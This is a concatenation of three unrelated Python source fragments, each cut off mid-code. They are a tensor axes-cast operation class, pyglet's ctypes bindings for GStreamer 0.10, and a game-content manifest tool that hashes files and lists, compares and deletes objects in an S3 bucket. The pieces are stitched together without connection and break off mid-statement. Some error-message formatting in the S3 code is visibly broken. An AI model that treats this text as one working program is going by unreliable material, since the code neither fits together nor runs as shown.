super(AxesCastOp, self).__init__(x, axes=axes, **kwargs)
def _check_valid_axes(self, x, axes):
if not x.is_scalar and x.axes.lengths != axes.lengths:
raise ValueError("casting axes {} must have the same length as original axes {}"
.format(axes, x.axes))
def transform_tensor_description(self, tensor_description):
return tensor_description.cast(self.axes)
def generate_adjoints(self, adjoints, delta, x):
x.generate_add_delta(adjoints, cast_axes(delta, x.axes))
def copy_with_new_args(self, args):
return type(self)(args[0], axes=self.axes)
class RoleCastOp(AxesCastOp):
"""
Used to set the names of the axes of a tensor, without altering its value.
If the names of | |
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: gstreamer.py 1033 2007-07-13 03:38:16Z Alex.Holkner $
'''High-level Gstreamer interface.
'''
import _ctypes
import ctypes
from ctypes import util
import time
import sys
import pyglet.lib
glib = pyglet.lib.load_library('glib-2.0')
gobject = pyglet.lib.load_library('gobject-2.0')
gst = pyglet.lib.load_library('gstreamer-0.10')
gstbase = pyglet.lib.load_library('gstbase-0.10')
GST_VERSION_MAJOR = 0
GST_VERSION_MINOR = 10
GST_VERSION_BUILD = 11
GST_STATE_VOID_PENDING = 0
GST_STATE_NULL = 1
GST_STATE_READY = 2
GST_STATE_PAUSED = 3
GST_STATE_PLAYING = 4
GST_FORMAT_TIME = 3
GstPluginInitFunc = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)
GST_PADDING = 4
GST_PADDING_LARGE = 20
class GstPluginDesc(ctypes.Structure):
_fields_ = [
('major_version', ctypes.c_int),
('minor_version', ctypes.c_int),
('name', ctypes.c_char_p),
('description', ctypes.c_char_p),
('plugin_init', GstPluginInitFunc),
('version', ctypes.c_char_p),
('license', ctypes.c_char_p),
('source', ctypes.c_char_p),
('package', ctypes.c_char_p),
('origin', ctypes.c_char_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING)
]
GType = ctypes.c_ulong
GBaseInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p)
GClassInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
GInstanceInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
class GTypeInfo(ctypes.Structure):
_fields_ = [
('class_size', ctypes.c_uint16),
('base_init', GBaseInitFunc),
('base_finalize', ctypes.c_void_p),
('class_init', GClassInitFunc),
('class_finalize', ctypes.c_void_p),
('class_data', ctypes.c_void_p),
('instance_size', ctypes.c_uint16),
('n_preallocs', ctypes.c_uint16),
('instance_init', GInstanceInitFunc),
('value_table', ctypes.c_void_p),
]
class GTypeClass(ctypes.Structure):
_fields_ = [
('g_type', GType),
]
class GTypeInstance(ctypes.Structure):
_fields_ = [
('g_class', ctypes.POINTER(GTypeClass)),
]
class GObject(ctypes.Structure):
_fields_ = [
('g_type_instance', GTypeInstance),
('ref_count', ctypes.c_uint),
('qdata', ctypes.c_void_p),
]
class GObjectClass(ctypes.Structure):
_fields_ = [
('g_type_class', GTypeClass),
('construct_properties', ctypes.c_void_p),
('constructor', ctypes.c_void_p),
('set_property', ctypes.c_void_p),
('get_property', ctypes.c_void_p),
('dispose', ctypes.c_void_p),
('finalize', ctypes.c_void_p),
('dispatch_properties_changed', ctypes.c_void_p),
('notify', ctypes.c_void_p),
('pdummy', ctypes.c_void_p * 8),
]
class GstCaps(ctypes.Structure):
_fields_ = [
('type', GType),
('refcount', ctypes.c_int),
('flags', ctypes.c_int),
('structs', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstStaticCaps(ctypes.Structure):
_fields_ = [
('caps', GstCaps),
('string', ctypes.c_char_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
def GST_STATIC_CAPS(string):
return GstStaticCaps(GstCaps(), string)
GST_PAD_ALWAYS = 0
GST_PAD_SOMETIMES = 1
GST_PAD_REQUEST = 2
GST_PAD_UNKNOWN = 0
GST_PAD_SRC = 1
GST_PAD_SINK = 2
class GstStaticPadTemplate(ctypes.Structure):
_fields_ = [
('name_template', ctypes.c_char_p),
('direction', ctypes.c_int),
('presence', ctypes.c_int),
('static_caps', GstStaticCaps),
]
class GstObject(ctypes.Structure):
_fields_ = [
('object', GObject),
('refcount', ctypes.c_int),
('lock', ctypes.c_void_p),
('name', ctypes.c_char_p),
('name_prefix', ctypes.c_char_p),
('parent', ctypes.c_void_p),
('flags', ctypes.c_uint32),
('_gst_reserved', ctypes.c_void_p),
]
class GstObjectClass(ctypes.Structure):
_fields_ = [
('parent_class', GObjectClass),
('path_string_separator', ctypes.c_char),
('signal_object', ctypes.c_void_p),
('lock', ctypes.c_void_p),
('parent_set', ctypes.c_void_p),
('parent_unset', ctypes.c_void_p),
('object_saved', ctypes.c_void_p),
('deep_notify', ctypes.c_void_p),
('save_thyself', ctypes.c_void_p),
('restore_thyself', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING)
]
class GstElementDetails(ctypes.Structure):
_fields_ = [
('longname', ctypes.c_char_p),
('klass', ctypes.c_char_p),
('description', ctypes.c_char_p),
('author', ctypes.c_char_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
GstState = ctypes.c_int
GstStateChangeReturn = ctypes.c_int
GstClockTimeDiff = ctypes.c_int64
GstClockID = ctypes.c_void_p
GstClockTime = ctypes.c_uint64
GstClockTimeDiff = ctypes.c_int64
GST_CLOCK_TIME_NONE = -1
class GstMiniObject(ctypes.Structure):
_fields_ = [
('instance', GTypeInstance),
('refcount', ctypes.c_int),
('flags', ctypes.c_uint),
('_gst_reserved', ctypes.c_void_p),
]
GST_EVENT_TYPE_SHIFT = 4
GST_EVENT_TYPE_UPSTREAM = 1 << 0
GST_EVENT_TYPE_DOWNSTREAM = 1 << 1
GST_EVENT_TYPE_SERIALIZED = 1 << 2
def GST_EVENT_MAKE_TYPE(num, flags):
return (num << GST_EVENT_TYPE_SHIFT) | flags
GstEventType = ctypes.c_int
GST_EVENT_EOS = GST_EVENT_MAKE_TYPE(5,
GST_EVENT_TYPE_DOWNSTREAM | GST_EVENT_TYPE_SERIALIZED)
class GstEvent(ctypes.Structure):
_fields_ = [
('mini_object', GstMiniObject),
('type', GstEventType),
('timestamp', ctypes.c_uint64),
('src', ctypes.c_void_p),
('structure', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p),
]
class GstBuffer(ctypes.Structure):
_fields_ = [
('mini_object', GstMiniObject),
('data', ctypes.c_void_p),
('size', ctypes.c_uint),
('timestamp', GstClockTime),
('duration', GstClockTime),
('caps', ctypes.POINTER(GstCaps)),
('offset', ctypes.c_uint64),
('offset_end', ctypes.c_uint64),
('malloc_data', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstSegment(ctypes.Structure):
_fields_ = [
('rate', ctypes.c_double),
('abs_rate', ctypes.c_double),
('format', ctypes.c_int),
('flags', ctypes.c_int),
('start', ctypes.c_int64),
('stop', ctypes.c_int64),
('time', ctypes.c_int64),
('accum', ctypes.c_int64),
('last_stop', ctypes.c_int64),
('duration', ctypes.c_int64),
#('applied_rate', ctypes.c_double), ABI added 0.10.6
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
#TEMP
GstPad = ctypes.c_int
GstFlowReturn = ctypes.c_int
GstPadChainFunction = ctypes.CFUNCTYPE(GstFlowReturn,
ctypes.POINTER(GstPad), ctypes.POINTER(GstBuffer))
GstPadSetCapsFunction = ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstPad), ctypes.POINTER(GstCaps))
GstPadEventFunction = ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstPad), ctypes.POINTER(GstEvent))
GstPadGetRangeFunction = ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstPad), ctypes.c_uint64, ctypes.c_uint,
ctypes.POINTER(ctypes.POINTER(GstBuffer)))
class GstElement(ctypes.Structure):
_fields_ = [
('object', GstObject),
('state_lock', ctypes.c_void_p),
('state_cond', ctypes.c_void_p),
('state_cookie', ctypes.c_uint32),
('current_state', GstState),
('next_state', GstState),
('pending_state', GstState),
('last_return', GstStateChangeReturn),
('bus', ctypes.c_void_p),
('clock', ctypes.c_void_p),
('base_time', GstClockTimeDiff),
('numpads', ctypes.c_uint16),
('pads', ctypes.c_void_p),
('numsrcpads', ctypes.c_uint16),
('srcpads', ctypes.c_void_p),
('numsinkpads', ctypes.c_uint16),
('sinkpads', ctypes.c_void_p),
('pads_cookie', ctypes.c_uint32),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstElementClass(ctypes.Structure):
_fields_ = [
('parent_class', GstObjectClass),
('details', GstElementDetails),
('elementfactory', ctypes.c_void_p),
('padtemplates', ctypes.c_void_p),
('numpadtemplates', ctypes.c_int),
('pad_templ_cookie', ctypes.c_uint32),
('pad_added', ctypes.c_void_p),
('pad_removed', ctypes.c_void_p),
('no_more_pads', ctypes.c_void_p),
('request_new_pad', ctypes.c_void_p),
('release_pad', ctypes.c_void_p),
('get_state', ctypes.c_void_p),
('set_state', ctypes.c_void_p),
('change_state', ctypes.c_void_p),
('set_bus', ctypes.c_void_p),
('provide_clock', ctypes.c_void_p),
('set_clock', ctypes.c_void_p),
('get_index', ctypes.c_void_p),
('set_index', ctypes.c_void_p),
('send_event', ctypes.c_void_p),
('get_query_types', ctypes.c_void_p),
('query', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstBaseSrc(ctypes.Structure):
_fields_ = [
('element', GstElement),
('srcpad', ctypes.POINTER(GstPad)),
('live_lock', ctypes.c_void_p),
('live_cond', ctypes.c_void_p),
('is_live', ctypes.c_int),
('live_running', ctypes.c_int),
('blocksize', ctypes.c_int),
('can_activate_push', ctypes.c_int),
('pad_mode', ctypes.c_int),
('seekable', ctypes.c_int),
('random_access', ctypes.c_int),
('clock_id', GstClockID),
('end_time', GstClockTime),
('segment', GstSegment),
('need_newsegment', ctypes.c_int),
('offset', ctypes.c_uint64),
('size', ctypes.c_uint64),
('num_buffers', ctypes.c_int),
('num_buffers_left', ctypes.c_int),
('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
('priv', ctypes.c_void_p),
]
class GstBaseSrcClass(ctypes.Structure):
_fields_ = [
('parent_class', GstElementClass),
('get_caps', ctypes.CFUNCTYPE(ctypes.c_void_p,
ctypes.POINTER(GstBaseSrc))),
('set_caps', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc), ctypes.c_void_p)),
('negotiate', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('newsegment', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('start', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('stop', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('get_times', ctypes.CFUNCTYPE(None,
ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstBuffer),
ctypes.POINTER(GstClockTime), ctypes.POINTER(GstClockTime))),
('get_size', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc), ctypes.POINTER(ctypes.c_uint64))),
('is_seekable', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('unlock', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc))),
('event', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstEvent))),
('create', ctypes.CFUNCTYPE(GstFlowReturn,
ctypes.POINTER(GstBaseSrc), ctypes.c_uint64, ctypes.c_uint,
ctypes.POINTER(ctypes.POINTER(GstBuffer)))),
('do_seek', ctypes.CFUNCTYPE(ctypes.c_int,
ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstSegment))),
('query', ctypes.c_void_p),
('check_get_range', ctypes.c_void_p),
('fixate', ctypes.c_void_p),
('_gst_reserved', (ctypes.c_void_p * (GST_PADDING_LARGE - 4))),
]
class GstBaseSink(ctypes.Structure):
_fields_ = [
('element', GstElement),
('sinkpad', ctypes.c_void_p),
('pad_mode', ctypes.c_int),
('offset', ctypes.c_uint64),
('can_activate_pull', ctypes.c_int),
('can_activate_push', ctypes.c_int),
('preroll_queue', ctypes.c_void_p),
('preroll_queue_max_len', ctypes.c_int),
('preroll_queued', ctypes.c_int),
('buffers_queued', ctypes.c_int),
('events_queued', ctypes.c_int),
('eos', ctypes.c_int),
('eos_queued', ctypes.c_int),
('need_preroll', ctypes.c_int),
('have_preroll', ctypes.c_int),
('playing_async', ctypes.c_int),
('have_newsegment', ctypes.c_int),
('segment', GstSegment),
('clock_id', ctypes.c_void_p),
('end_time', ctypes.c_uint64),
('sync', ctypes.c_int),
('flushing', ctypes.c_int),
('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
('priv', ctypes.c_void_p),
]
class GstBaseSinkClass(ctypes.Structure):
_fields_ = [
('parent_class', GstElementClass),
('get_caps', ctypes.c_void_p),
('set_caps', ctypes.c_void_p),
('buffer_alloc', ctypes.c_void_p),
('get_times', ctypes.c_void_p),
('start', ctypes.c_void_p),
('stop', ctypes.c_void_p),
('unlock', ctypes.c_void_p),
('event', ctypes.c_void_p),
('preroll', ctypes.c_void_p),
('render', ctypes.c_void_p),
('async_play', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
]
class GstBaseAudioSink(ctypes.Structure):
_fields_ = [
('element', GstBaseSink),
('ringbuffer', ctypes.c_void_p),
('buffer_time', ctypes.c_uint64),
('latency_time', ctypes.c_uint64),
('next_sample', ctypes.c_uint64),
('provide_clock', ctypes.c_int),
('provided_clock', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstBaseAudioSinkClass(ctypes.Structure):
_fields_ = [
('parent_class', GstBaseSinkClass),
('create_ringbuffer', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstAudioSink(ctypes.Structure):
_fields_ = [
('element', GstBaseAudioSink),
('thread', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
GstBufferFormatType = ctypes.c_int
GST_BUFFER_LINEAR = 0
GST_BUFFER_FLOAT = 1
GST_BUFFER_MU_LAW = 2
GST_BUFFER_A_LAW = 3
GST_BUFFER_IMA_ADPCM = 4
GST_BUFFER_MPEG = 5
GST_BUFFER_GSM = 6
GstBufferFormat = ctypes.c_int
class GstRingBufferSpec(ctypes.Structure):
_fields_ = [
('caps', ctypes.POINTER(GstCaps)),
('type', GstBufferFormatType),
('format', GstBufferFormat),
('sign', ctypes.c_int),
('bigend', ctypes.c_int),
('width', ctypes.c_int),
('depth', ctypes.c_int),
('rate', ctypes.c_int),
('channels', ctypes.c_int),
('latency_time', ctypes.c_uint64),
('buffer_time', ctypes.c_uint64),
('segsize', ctypes.c_int),
('segtotal', ctypes.c_int),
('bytes_per_sample', ctypes.c_int),
('silence_sample', ctypes.c_uint8 * 32),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
class GstAudioSinkClass(ctypes.Structure):
_fields_ = [
('parent_class', GstBaseAudioSinkClass),
('open', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
('prepare', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p,
ctypes.POINTER(GstRingBufferSpec))),
('unprepare', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
('close', ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)),
('write', ctypes.CFUNCTYPE(ctypes.c_uint, ctypes.c_void_p,
ctypes.POINTER(ctypes.c_byte), ctypes.c_uint)),
('delay', ctypes.CFUNCTYPE(ctypes.c_uint, ctypes.c_void_p)),
('reset', ctypes.CFUNCTYPE(None, ctypes.c_void_p)),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
def py_derived_element(base):
'''Derive a GstElement with a 'pyobject' member.'''
class PyGstElement(ctypes.Structure):
_fields_ = [
('element', base),
('pyobject', ctypes.py_object),
]
return PyGstElement
GstMessageType = ctypes.c_int
GST_MESSAGE_UNKNOWN = 0
GST_MESSAGE_EOS = (1 << 0)
GST_MESSAGE_ERROR = (1 << 1)
GST_MESSAGE_WARNING = (1 << 2)
GST_MESSAGE_INFO = (1 << 3)
GST_MESSAGE_TAG = (1 << 4)
GST_MESSAGE_BUFFERING = (1 << 5)
GST_MESSAGE_STATE_CHANGED = (1 << 6)
GST_MESSAGE_STATE_DIRTY = (1 << 7)
GST_MESSAGE_STEP_DONE = (1 << 8)
GST_MESSAGE_CLOCK_PROVIDE = (1 << 9)
GST_MESSAGE_CLOCK_LOST = (1 << 10)
GST_MESSAGE_NEW_CLOCK = (1 << 11)
GST_MESSAGE_STRUCTURE_CHANGE = (1 << 12)
GST_MESSAGE_STREAM_STATUS = (1 << 13)
GST_MESSAGE_APPLICATION = (1 << 14)
GST_MESSAGE_ELEMENT = (1 << 15)
GST_MESSAGE_SEGMENT_START = (1 << 16)
GST_MESSAGE_SEGMENT_DONE = (1 << 17)
GST_MESSAGE_DURATION = (1 << 18)
GST_MESSAGE_LATENCY = (1 << 19)
GST_MESSAGE_ANY = ~0
class GstMessage(ctypes.Structure):
_fields_ = [
('mini_object', GstMiniObject),
('lock', ctypes.c_void_p),
('cond', ctypes.c_void_p),
('type', GstMessageType),
('timestamp', ctypes.c_uint64),
('src', ctypes.c_void_p),
('structure', ctypes.c_void_p),
('_gst_reserved', ctypes.c_void_p * GST_PADDING),
]
gst.gst_bus_poll.restype = ctypes.POINTER(GstMessage)
# Python high-level classes
class Plugin(object):
name = ''
description = ''
version = ''
license | |
replace_path = ensure_posix_path(pak_path)
try:
return replace_path.split(context.config.game_directory_name + '/')[1]
except:
return replace_path
def _add_pak_to_manifest(context, pak_path, manifest_path, manifest, platform_name):
paks_list = _get_paks_list(context, manifest)
potential_pak_file_entry_path = _get_relative_path_after_game_dir(context, pak_path)
pak_already_listed_in_manifest = False
for pakEntryToCheck in paks_list:
if pakEntryToCheck.get('pakFile') == potential_pak_file_entry_path:
pak_already_listed_in_manifest = True
break
if not pak_already_listed_in_manifest:
add_file_entry(context, manifest_path, potential_pak_file_entry_path, 'Paks', potential_pak_file_entry_path, './',
platform_type=platform_name)
def _remove_file_entry_from_section(context, file_name, platform, manifest_path, manifest, section):
if section is None:
raise HandledError('No section specified to remove file entry from')
if file_name is None:
raise HandledError('No file name specified')
files_list = _get_files_list(context, manifest, section)
name_pair = os.path.split(file_name)
file_name = name_pair[1]
local_path = name_pair[0]
found_entry = False
for thisFile in files_list:
if thisFile['keyName'] == file_name and thisFile['localFolder'] == local_path \
and thisFile['platformType'] == platform:
files_list.remove(thisFile)
found_entry = True
manifest[section] = files_list
if found_entry:
_save_content_manifest(context, manifest_path, manifest)
return found_entry
def validate_writable(context, manifest_path):
manifest_path, manifest = _get_path_and_manifest(context, manifest_path)
if not context.config.validate_writable(manifest_path):
show_manifest.manifest_not_writable(manifest_path)
return False
return True
def remove_file_entry(context, args):
manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
if args.file_name is None:
raise HandledError('No file name specified')
if args.platform_type is None:
raise HandledError('No platform type specified')
found_entry = _remove_file_entry_from_section(context, args.file_name, args.platform_type, manifest_path, manifest, 'Files')
if not found_entry:
found_entry = _remove_file_entry_from_section(context, args.file_name, args.platform_type, manifest_path, manifest, 'Paks')
if not found_entry:
raise HandledError('Key not found {} with platform type {}'.format(args.file_name, args.platform_type))
def _get_files_list(context, manifest, section=None):
if manifest is None:
raise HandledError('No manifest data loaded')
if section is not None:
files_list = manifest.get(section)
if files_list is None:
if section not in ['Files', 'Paks']:
raise HandledError('No section {} found in manifest'.format(section))
files_list = []
else:
files_list = []
files_list.extend(manifest.get('Files', []))
files_list.extend(manifest.get('Paks', []))
return files_list
def _get_platforms_list(context, manifest):
if manifest is None:
raise HandledError('No manifest data loaded')
return manifest.get('Metadata', {}).get('Platforms', [])
def _get_paks_list(context, manifest):
if manifest is None:
raise HandledError('No manifest data loaded')
paks_list = manifest.get('Paks', [])
if paks_list is None:
raise HandledError('No Paks list found in manifest')
return paks_list
def _get_default_manifest_path(context):
base_path = dynamic_content_settings.get_manifest_game_folder(context.config.game_directory_path)
return_path = os.path.join(base_path, dynamic_content_settings.get_default_manifest_name())
return return_path
def determine_manifest_path(context, provided_name):
if provided_name is None:
manifest_path = _get_default_manifest_path(context)
else:
manifest_path = os.path.join(
dynamic_content_settings.get_manifest_game_folder(context.config.game_directory_path), provided_name)
return manifest_path
def _get_path_and_manifest(context, provided_name):
manifest_path = determine_manifest_path(context, provided_name)
manifest = context.config.load_json(manifest_path)
return manifest_path, manifest
def command_update_file_hashes(context, args):
manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
_update_file_hashes(context, manifest_path, manifest)
def _update_file_hash_section(context, manifest_path, manifest, section):
if section is None:
raise HandledError('No specified to update hashes for')
files_list = _get_files_list(context, manifest, section)
show_manifest.updating_file_hashes(manifest_path)
files_updated = False
for this_file in files_list:
this_file_path = _get_path_for_file_entry(context, this_file, context.config.game_directory_name)
if not os.path.isfile(this_file_path):
show_manifest.invalid_file(this_file_path)
this_file['hash'] = ''
this_file['size'] = None
continue
hex_return = hashlib.md5(open(this_file_path, 'rb').read()).hexdigest()
manifest_hash = this_file.get('hash', '')
if hex_return != manifest_hash:
files_updated = True
show_manifest.hash_comparison_disk(this_file_path, manifest_hash, hex_return)
this_file['hash'] = hex_return
file_stat = os.stat(this_file_path)
this_file['size'] = file_stat.st_size
manifest[section] = files_list
return files_updated
def _update_file_hashes(context, manifest_path, manifest):
need_save = _update_file_hash_section(context, manifest_path, manifest, 'Files')
need_save |= _update_file_hash_section(context, manifest_path, manifest, 'Paks')
if need_save:
_save_content_manifest(context, manifest_path, manifest)
def _save_content_manifest(context, filePath, manifestData):
context.config.validate_writable(filePath)
context.config.save_json(filePath, manifestData)
print("Updated manifest")
def _get_content_bucket(context):
return _get_content_bucket_by_name(context, context.config.default_deployment, dynamic_content_settings.get_default_resource_group(), dynamic_content_settings.get_default_bucket_name())
def _get_content_bucket_by_name(context, deployment_name,
resource_group_name=dynamic_content_settings.get_default_resource_group(),
bucket_name=dynamic_content_settings.get_default_bucket_name()):
"""Returns the resource id of the content bucket."""
if deployment_name is None:
deployment_name = context.config.default_deployment
stack_id = context.config.get_resource_group_stack_id(deployment_name, resource_group_name, optional=True)
bucket_resource = context.stack.get_physical_resource_id(stack_id, bucket_name)
return bucket_resource
def _get_bucket_content_list(context):
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket(context)
next_marker = 0
contents_list = []
while True:
try:
res = s3.list_objects(
Bucket=bucket_name,
Marker=str(next_marker)
)
this_list = res.get('Contents', [])
contents_list += this_list
if len(this_list) < get_list_objects_limit():
break
next_marker += get_list_objects_limit()
except Exception as e:
raise HandledError('Could not list_objects on '.format(bucket=bucket_name), e)
return contents_list
def _send_bucket_delete_list(context, objectList):
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket(context)
try:
res = s3.delete_objects(
Bucket=bucket_name,
Delete={'Objects': objectList}
)
except Exception as e:
raise HandledError('Could not delete_objects on '.format(bucket=bucket_name), e)
def command_empty_content(context, args):
_empty_bucket_contents(context)
staging.empty_staging_table(context)
def _empty_bucket_contents(context):
contents_list = _get_bucket_content_list(context)
object_list = []
for thisContent in contents_list:
object_list.append({'Key': thisContent.get('Key', {})})
if len(object_list) == get_list_objects_limit():
_send_bucket_delete_list(context, object_list)
object_list = []
if len(object_list):
_send_bucket_delete_list(context, object_list)
def make_end_in_slash(file_name):
return posixpath.join(file_name, '')
def _create_bucket_key(fileEntry):
file_key = fileEntry.get('bucketPrefix', '')
if len(file_key):
file_key += '/'
file_key += fileEntry.get('keyName', '')
return file_key
def get_standalone_manifest_pak_key(context, manifest_path):
return os.path.split(_get_path_for_standalone_manifest_pak(context, manifest_path))[1]
def get_standalone_manifest_key(context, manifest_path):
return os.path.split(manifest_path)[1]
def add_manifest_pak_entry(context, manifest, manifest_path, filesList):
""" When uploading all of the changed content within a top level manifest we're going to need to pak up the
manifest itself and upload that as well.
This method lets us simply append an entry about that manifest pak to the list of "changed content" so it all goes
up in one pass.
"""
manifest_object = {
'keyName': get_standalone_manifest_pak_key(context, manifest_path),
'localFolder': dynamic_content_settings.get_pak_folder(),
'hash': hashlib.md5(open(manifest_path, 'rb').read()).hexdigest()
}
file_stat = os.stat(manifest_path)
manifest_object['size'] = file_stat.st_size
filesList.append(manifest_object)
def _create_manifest_bucket_key_map(context, manifest, manifest_path):
files_list = _get_files_list(context, manifest, 'Paks')
add_manifest_pak_entry(context, manifest, manifest_path, files_list)
_append_loose_manifest(context, files_list, manifest_path)
return_map = {}
for thisFile in files_list:
file_key = _create_bucket_key(thisFile)
return_map[file_key] = thisFile.get('hash', '')
return return_map
def list_bucket_content(context, args):
manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
contents_list = _get_bucket_content_list(context)
manifest_dict = _create_manifest_bucket_key_map(context, manifest, manifest_path)
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket(context)
for thisBucketItem in contents_list:
this_key = thisBucketItem.get('Key')
if this_key in manifest_dict:
try:
head_response = s3.head_object(
Bucket=bucket_name,
Key=this_key
)
except Exception as e:
show_manifest.key_not_found(this_key)
continue
show_manifest.hash_comparison_bucket(this_key, manifest_dict[this_key], _get_bucket_item_hash(head_response))
del manifest_dict[this_key]
for remainingKey in manifest_dict.keys():
show_manifest.new_local_key(remainingKey)
def compare_bucket_content(context, args):
manifest_path, manifest = _get_path_and_manifest(context, args.manifest_path)
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket(context)
manifest_dict = _create_manifest_bucket_key_map(context, manifest, manifest_path)
for thisKey, thisHash in iteritems(manifest_dict):
try:
headResponse = s3.head_object(
Bucket=bucket_name,
Key=thisKey
)
except Exception as e:
show_manifest.key_not_found(thisKey)
continue
show_manifest.hash_comparison_bucket(thisKey, thisHash, _get_bucket_item_hash(headResponse))
def check_matched_bucket_entry(context, localFile, localHash, bucketKey):
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket(context)
try:
head_response = s3.head_object(
Bucket=bucket_name,
Key=bucketKey
)
except Exception as e:
print("Didn't find entry {}".format(bucketKey))
return False
bucket_hash = _get_bucket_item_hash(head_response)
print("Comparing {} vs Bucket {}".format(localHash, bucket_hash))
return bucket_hash == localHash
def _get_bucket_item_hash(bucketItem):
return bucketItem.get('Metadata', {}).get(_get_meta_hash_name(),{})
# Retrieve the list of files in the bucket which do not line up with our current manifest
def _get_unmatched_content(context, manifest, manifest_path, deployment_name, do_signing):
s3 = context.aws.client('s3')
bucket_name = _get_content_bucket_by_name(context, deployment_name)
manifest_dict = _create_manifest_bucket_key_map(context, manifest, manifest_path)
return_dict = {}
for thisKey, thisHash in iteritems(manifest_dict):
try:
headResponse = s3.head_object(
Bucket=bucket_name,
Key=thisKey
)
except Exception as e:
show_manifest.key_not_found(thisKey)
return_dict[thisKey] = thisHash
continue
show_manifest.hash_comparison_bucket(thisKey, thisHash, _get_bucket_item_hash(headResponse))
if _get_bucket_item_hash(headResponse) != thisHash or staging.signing_status_changed(context, thisKey, do_signing):
return_dict[thisKey] = thisHash
return return_dict
class ProgressPercentage(object):
def __init__(self, context, filename):
self._filename = filename
self._context = context
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
self._last_print_percent = -1
def __call__(self, bytes_amount):
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
if round(percentage / 2) != round(self._last_print_percent / 2):
self._last_print_percent = percentage
self._context.view.update_percent_complete(self._last_print_percent)
def command_upload_manifest_content(context, args):
staging_args = staging.parse_staging_arguments(args)
upload_manifest_content(context, args.manifest_path, args.deployment_name, staging_args, args.all, args.signing, args.invalidate_existing_files)
def _append_loose_manifest(context, files_list, manifest_path):
